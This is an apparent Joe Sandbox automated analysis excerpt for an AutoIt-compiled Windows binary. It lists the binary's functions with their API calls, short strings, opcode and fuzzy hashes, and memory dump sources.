                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1946975507-0
                                                                        • Opcode ID: 9483770ec73cfc0d9a5b1ca76421dd90cac535915ba870e45b73a75ef82ea3a9
                                                                        • Instruction ID: 32f444619698671fc9ccff586526c8acc8ba763ca9ba6ff527bdab58d6b1d3bf
                                                                        • Opcode Fuzzy Hash: 9483770ec73cfc0d9a5b1ca76421dd90cac535915ba870e45b73a75ef82ea3a9
                                                                        • Instruction Fuzzy Hash: C4E06531508244AEDB211B65AC0DBE83F129B92339F10C316F679680E1C3714544DB11
                                                                        Function 00EAB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EAB2DF
                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00EAB2EB
                                                                        • CloseHandle.KERNEL32(?), ref: 00EAB2F4
                                                                        • CloseHandle.KERNEL32(?), ref: 00EAB2FC
                                                                          • Part of subcall function 00EAAB24: GetProcessHeap.KERNEL32(00000000,?,00EAA848), ref: 00EAAB2B
                                                                          • Part of subcall function 00EAAB24: HeapFree.KERNEL32(00000000), ref: 00EAAB32
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                        • String ID:
                                                                        • API String ID: 146765662-0
                                                                        • Opcode ID: e386ff06fdbaa930bef7dfe599ee62246abfebe2240b37a99db7952425045ccd
                                                                        • Instruction ID: 344ba88630dcfcb984009e02f66c70ade2a490e2324bcda142f6d3af82b4c9e3
                                                                        • Opcode Fuzzy Hash: e386ff06fdbaa930bef7dfe599ee62246abfebe2240b37a99db7952425045ccd
                                                                        • Instruction Fuzzy Hash: 09E0BF36108005BFDB012B96DC0886DFFA7FFC93213108222F61591571CB32A475EB91
                                                                        Function 00EEB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: d63dd13f95266b5b22305ab9beb5c528d3916df7eb2c6e59f8ff853ae85b17f4
                                                                        • Instruction ID: f546e2ae504014272af296d86312249ffc5853c197ccf415433bbf4b02e4c62f
                                                                        • Opcode Fuzzy Hash: d63dd13f95266b5b22305ab9beb5c528d3916df7eb2c6e59f8ff853ae85b17f4
                                                                        • Instruction Fuzzy Hash: 54E01AB1104204EFDB005F718C48A7E7FA6EF8C351F129809F95EEB250CB749845DB40
                                                                        Function 00EEB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: 37b2a91c37148dc68e52b93cce57392f2ddd9843969ea3072bd3245779d006ed
                                                                        • Instruction ID: 55d8d983a3da8e20629843ff918779fe834b83ef117fd833015cabeb88e625c0
                                                                        • Opcode Fuzzy Hash: 37b2a91c37148dc68e52b93cce57392f2ddd9843969ea3072bd3245779d006ed
                                                                        • Instruction Fuzzy Hash: 32E012B1508204EFDB006F718C48A7DBFAAEB8C351B128809F95EEB250CBB89805CB00
                                                                        Function 00EADCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00EADEAA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ContainedObject
                                                                        • String ID: AutoIt3GUI$Container
                                                                        • API String ID: 3565006973-3941886329
                                                                        • Opcode ID: 2edbf84ead5f8813800c1d15d8f8d9cb69e6d854ec05a702fbe6ff0b9d239e4e
                                                                        • Instruction ID: 06f46583efc3650667ef6fe64fcd5e5805f71af1586acd1b3f03056540cd0bbc
                                                                        • Opcode Fuzzy Hash: 2edbf84ead5f8813800c1d15d8f8d9cb69e6d854ec05a702fbe6ff0b9d239e4e
                                                                        • Instruction Fuzzy Hash: 58915774604601AFDB24DF64C884B6ABBF9BF49714F10856DF84AEF691DB70E841CB60
                                                                        Function 00EBDE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8C6F4: _wcscpy.LIBCMT ref: 00E8C717
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • __wcsnicmp.LIBCMT ref: 00EBDEFD
                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EBDFC6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                        • String ID: LPT
                                                                        • API String ID: 3222508074-1350329615
                                                                        • Opcode ID: 9f9a22fedc2716825c1c087b39fd35f00b81fe414d8d00ce64745ff5477d4279
                                                                        • Instruction ID: b657fa2f368437f5e576c244c1f6e0d09defd514b6a3ad7e76c124c38371a3e8
                                                                        • Opcode Fuzzy Hash: 9f9a22fedc2716825c1c087b39fd35f00b81fe414d8d00ce64745ff5477d4279
                                                                        • Instruction Fuzzy Hash: 67617C75A04215AFCB14EF98C981EEEB7F5AF08710F149069F54ABB391D770AE40DB90
                                                                        Function 00EB290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy
                                                                        • String ID: I/$I/
                                                                        • API String ID: 3048848545-2526233121
                                                                        • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                        • Instruction ID: c54217c455603b908ebd18a4db4e24c7cd1bc58b125df6802fa8124e6b437e2c
                                                                        • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                        • Instruction Fuzzy Hash: 8E41D931900216AACF25DF98D4819FEB7B0EF49714F54705FEA85B7191E7306E82D7A0
                                                                        Function 00E8BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 00E8BCDA
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00E8BCF3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemorySleepStatus
                                                                        • String ID: @
                                                                        • API String ID: 2783356886-2766056989
                                                                        • Opcode ID: 2d25ac910cb2c48f1166395d4e1089d797d5f4f1f642bfb8ab0f243f175d63e1
                                                                        • Instruction ID: 79fdc825419f7471b2f303d3aa7d4797011cebcee6cd8a6b44896b607877e55a
                                                                        • Opcode Fuzzy Hash: 2d25ac910cb2c48f1166395d4e1089d797d5f4f1f642bfb8ab0f243f175d63e1
                                                                        • Instruction Fuzzy Hash: 34513472408748ABE321AF14DC86BAFBBE8FBD4354F41484EF2C8510A2DB7085A98752
                                                                        Function 00EBC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E744ED: __fread_nolock.LIBCMT ref: 00E7450B
                                                                        • _wcscmp.LIBCMT ref: 00EBC65D
                                                                        • _wcscmp.LIBCMT ref: 00EBC670
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscmp$__fread_nolock
                                                                        • String ID: FILE
                                                                        • API String ID: 4029003684-3121273764
                                                                        • Opcode ID: 2d3420135b68e1aea8249a4e005a2517c737bdad8e433664a17aed653a417ae5
                                                                        • Instruction ID: 84a1526bb04ec9f0eeecf694b4f587198d9e28a481bc25796dd86909dbf03c0b
                                                                        • Opcode Fuzzy Hash: 2d3420135b68e1aea8249a4e005a2517c737bdad8e433664a17aed653a417ae5
                                                                        • Instruction Fuzzy Hash: 0741D4B2A0421ABBDF209AA4DC42FEF77F9AF49714F005069F615FB181D7709A04DB61
                                                                        Function 00EDA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00EDA85A
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EDA86F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: '
                                                                        • API String ID: 3850602802-1997036262
                                                                        • Opcode ID: 5a8ee9c363d34658d257c438799f056b480f164f985288b1ef629197155aaecf
                                                                        • Instruction ID: 0d39f99360ad715502c74342201589a5ff693f1e7a8060b1ba5b08a58c007ee2
                                                                        • Opcode Fuzzy Hash: 5a8ee9c363d34658d257c438799f056b480f164f985288b1ef629197155aaecf
                                                                        • Instruction Fuzzy Hash: 84410778A013099FDB14CFA8C885BDA7BBAFB08304F14106AE905EB341D770AA42DF91
                                                                        Function 00ED975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00ED980E
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00ED984A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DestroyMove
                                                                        • String ID: static
                                                                        • API String ID: 2139405536-2160076837
                                                                        • Opcode ID: fc5d853f75fe93c687e87ebc63cf6260999997d41d0cb891ac341c7fe390a56c
                                                                        • Instruction ID: 12c7cc6f8a6c15459f328645a119713f353776b508490fd250670cd4faebc5c5
                                                                        • Opcode Fuzzy Hash: fc5d853f75fe93c687e87ebc63cf6260999997d41d0cb891ac341c7fe390a56c
                                                                        • Instruction Fuzzy Hash: FC31A175110604AEDB149F74CC80BFB77A9FF99764F00961AF8A9E7291CB31AC42D760
                                                                        Function 00EB5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EB51C6
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EB5201
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        • Opcode ID: 99469fe724be8604b78ca6937cc22e6c25edc64929633e7ba02cc768795067fd
                                                                        • Instruction ID: 4bcee10526229e0ce56dc3ecd0170b89c5674a87703f7f37367e2f568615a866
                                                                        • Opcode Fuzzy Hash: 99469fe724be8604b78ca6937cc22e6c25edc64929633e7ba02cc768795067fd
                                                                        • Instruction Fuzzy Hash: 9331C132601704DFEB24CF99E945BEFBBF4AF45354F145019E985B61B0E7709A44CB10
                                                                        Function 00EC658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __snwprintf
                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                        • API String ID: 2391506597-2584243854
                                                                        • Opcode ID: a9cb947e3307c91f1c66337bc8d08444c4712d7ce47486a8a6eeb20699ff4355
                                                                        • Instruction ID: 3fc72d15dc6452102a68202994b7b279ddf454e7189adb3dad7449aa148c763d
                                                                        • Opcode Fuzzy Hash: a9cb947e3307c91f1c66337bc8d08444c4712d7ce47486a8a6eeb20699ff4355
                                                                        • Instruction Fuzzy Hash: F9218F71600228AFCF10EFA4D982FAE73F4AF49700F405459F409BB181DB71EA46DBA2
                                                                        Function 00ED93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00ED945C
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00ED9467
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Combobox
                                                                        • API String ID: 3850602802-2096851135
                                                                        • Opcode ID: 3557b399e70c444398fe5bd233a16626d4f803a97792eafe72ba897284a4b497
                                                                        • Instruction ID: 1ebd5741452218f85a150bac9711cc0bb6b1b1f280116c0c3bcc8ce27a88cff2
                                                                        • Opcode Fuzzy Hash: 3557b399e70c444398fe5bd233a16626d4f803a97792eafe72ba897284a4b497
                                                                        • Instruction Fuzzy Hash: 1B1160713102086FEF119E54DCC1EBB376BEB983A8F105126F929A73A2D6719C5297A0
                                                                        Function 00EDDA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • GetActiveWindow.USER32 ref: 00EDDA7B
                                                                        • EnumChildWindows.USER32(?,00EDD75F,00000000), ref: 00EDDAF5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ActiveChildEnumLongWindows
                                                                        • String ID: T1
                                                                        • API String ID: 3814560230-924183305
                                                                        • Opcode ID: 58efbc27a37eae7673e6304f236c3913f6cfd27e0f448b4111e497a295fc28a4
                                                                        • Instruction ID: 7d1fc8ac2a7ecf57b758ccce82e0400a6bc3ede15c6d032770f8f830f524c6d5
                                                                        • Opcode Fuzzy Hash: 58efbc27a37eae7673e6304f236c3913f6cfd27e0f448b4111e497a295fc28a4
                                                                        • Instruction Fuzzy Hash: F4213935208205DFC714DF68DC51AA677E6FB99334F25161AE86A973E0D730A802DB60
                                                                        Function 00ED98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E8D1BA
                                                                          • Part of subcall function 00E8D17C: GetStockObject.GDI32(00000011), ref: 00E8D1CE
                                                                          • Part of subcall function 00E8D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E8D1D8
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00ED9968
                                                                        • GetSysColor.USER32(00000012), ref: 00ED9982
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                        • String ID: static
                                                                        • API String ID: 1983116058-2160076837
                                                                        • Opcode ID: 899f62a62701b1e5bcb837beb475b543aa3f80100055cf659ac47f85814cbc2a
                                                                        • Instruction ID: d7db3464c7a4e7738f70b9eff53532ce6c550bb0816fcfa159a1f65b42c0c39e
                                                                        • Opcode Fuzzy Hash: 899f62a62701b1e5bcb837beb475b543aa3f80100055cf659ac47f85814cbc2a
                                                                        • Instruction Fuzzy Hash: E8115972510209AFDB04DFB8CC45AFA7BA8FF48314F011629F955E2251D734E811DB50
                                                                        Function 00ED9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 00ED9699
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00ED96A8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
